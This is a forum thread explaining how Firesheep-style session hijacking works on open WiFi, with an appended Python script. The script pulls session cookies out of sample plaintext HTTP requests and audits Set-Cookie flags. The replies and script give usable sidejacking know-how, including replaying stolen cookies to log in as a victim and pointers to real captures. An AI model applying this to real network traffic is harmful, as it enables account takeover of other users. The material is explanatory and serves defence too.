
Firesheep - How Does It Obtain The Session Cookie?




I have a couple of questions about Firesheep.

AIUI, it works when - although the logon is HTTPS - the cookie sent by the server immediately after the logon is finished is sent through HTTP. Therefore, Firesheep is defeated by constant HTTPS (as can happen in Gmail and Facebook for example).

What I do not understand having read (http://codebutler.com/firesheep) is whether the Firesheep user is operating as a MITM in order to obtain the session cookie. In the episode (http://hak5.org/episodes/episode-906) it looks as if Shannon is using Cain to ARPspoof Darren before using Firesheep. However, there is no mention of ARPspoofing on the coder's site and instead he says "On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy."

Is this really the situation? Why would a cookie be sent to anyone on the wireless network rather than to the actual client who has just logged in? And, therefore, how exactly does Firesheep obtain the session cookie?



Better to use Hamster and Ferret, as it doesn't require a site profile to grab the cookies. Hamster and Ferret will work on any site. Basically it's a packet capture tool, kind of like Wireshark and tcpdump, but specializes in pulling the cookies out of the packets and associating them with the site they came from. You can then dump them to your browser and log in as the end user. You could also do this manually with Wireshark and a card in monitor mode on an unencrypted network, but it's a pain in the ass to have to enter them all by hand when tools do it for you.

Edited by digip

On wired networks or WPA Enterprise networks you need to do a MITM first.

WiFi networks work like a hub: everyone receives the traffic (you can't direct those radio waves to every client individually), so on open networks you can get those cookies (and all other traffic, of course!). On WEP networks you can do the same if you know/crack the password, and on WPA networks you can do the same if you know/crack the password AND capture the handshake of the user(s) you are trying to sniff.

The cookie itself is just sent in plain text (you can verify this with Wireshark), so if you can see the traffic, you can see the cookie.

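The two answers above make the same point from different angles: Hamster/Ferret and a Firesheep site profile both just read the `Cookie:` header out of plaintext HTTP requests seen on the wire, and the reason there is anything to read is that the server set the session cookie without the `Secure` flag, so the browser keeps sending it over HTTP after the HTTPS login. The script below is an added example, not code from the thread, from Hak5, or from Firesheep/Hamster/Ferret. It works on constructed sample payloads (the hosts, addresses and cookie values are made up) standing in for TCP payloads a sniffer in monitor mode would have captured on an open network, and it does two things: builds a per-host cookie jar from requests, the way Ferret does, and audits `Set-Cookie` lines in responses for the `Secure`/`HttpOnly` flags that would have kept the cookie off the plaintext channel.

```python
"""Pull session cookies out of captured plaintext HTTP, as Ferret/Hamster or a
Firesheep site profile does. Added example, not Hak5/Firesheep/Ferret code.
All captured payloads below are constructed for illustration."""

import re
from collections import defaultdict

# Constructed sample of what a sniffer on an open WiFi network sees:
# (src IP, dst IP, TCP payload). The TLS login exchange is opaque to the
# sniffer, so only a ClientHello fragment is included to show it is skipped.
CAPTURED_PAYLOADS = [
    ("10.0.0.5", "203.0.113.10",
     b"GET /home HTTP/1.1\r\nHost: social.example\r\n"
     b"Cookie: session_id=abc123; lang=en\r\nUser-Agent: Firefox\r\n\r\n"),
    ("203.0.113.10", "10.0.0.5",
     b"HTTP/1.1 200 OK\r\nSet-Cookie: session_id=abc123; Path=/\r\n"
     b"Set-Cookie: csrf=zz9; Path=/; Secure; HttpOnly\r\n"
     b"Content-Length: 0\r\n\r\n"),
    ("10.0.0.5", "203.0.113.20",
     b"GET /inbox HTTP/1.1\r\nHost: mail.example\r\n"
     b"Cookie: SID=deadbeef\r\n\r\n"),
    ("10.0.0.5", "203.0.113.20",
     b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03"),  # TLS ClientHello: opaque
]

REQUEST_LINE = re.compile(r"^[A-Z]+ \S+ HTTP/1\.[01]$")


def parse_http_headers(payload: bytes):
    """Return (start_line, [(name, value), ...]) or None if not plaintext HTTP."""
    try:
        text = payload.decode("ascii")
    except UnicodeDecodeError:
        return None
    head, _, _ = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    start = lines[0]
    if not (start.startswith("HTTP/") or REQUEST_LINE.match(start)):
        return None
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return start, headers


def extract_request_cookies(payloads):
    """Map host -> {cookie name: value} from Cookie headers in plaintext requests.
    These are exactly the values an attacker replays to become the victim."""
    jar = defaultdict(dict)
    for _src, _dst, payload in payloads:
        parsed = parse_http_headers(payload)
        if parsed is None or parsed[0].startswith("HTTP/"):
            continue  # not HTTP, or a response rather than a request
        headers = dict(parsed[1])
        host, cookie = headers.get("host"), headers.get("cookie")
        if not host or not cookie:
            continue
        for pair in cookie.split(";"):
            name, sep, value = pair.strip().partition("=")
            if sep:
                jar[host][name] = value
    return dict(jar)


def audit_set_cookies(payloads):
    """List (cookie name, has Secure, has HttpOnly) for Set-Cookie lines in
    plaintext responses. A cookie set without Secure is sent by the browser
    over plain HTTP too, which is what makes the post-login session sniffable."""
    findings = []
    for _src, _dst, payload in payloads:
        parsed = parse_http_headers(payload)
        if parsed is None or not parsed[0].startswith("HTTP/"):
            continue
        for name, value in parsed[1]:
            if name != "set-cookie":
                continue
            parts = [p.strip() for p in value.split(";")]
            cookie_name = parts[0].partition("=")[0]
            flags = {p.lower() for p in parts[1:]}
            findings.append((cookie_name, "secure" in flags, "httponly" in flags))
    return findings


if __name__ == "__main__":
    for host, cookies in extract_request_cookies(CAPTURED_PAYLOADS).items():
        print(host, cookies)
    for name, secure, httponly in audit_set_cookies(CAPTURED_PAYLOADS):
        print(f"Set-Cookie {name}: Secure={secure} HttpOnly={httponly}")
```

Note what the output shows: `session_id` for `social.example` is harvested from the plaintext request, and the audit confirms it was set without `Secure`, while `csrf` was set with `Secure` and never appears in a plaintext request. Feeding real traffic into this means replacing the constructed list with TCP payloads reassembled from a capture (monitor mode on an open network, or after ARP spoofing on a switched one, as the thread describes); the parsing does not change.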
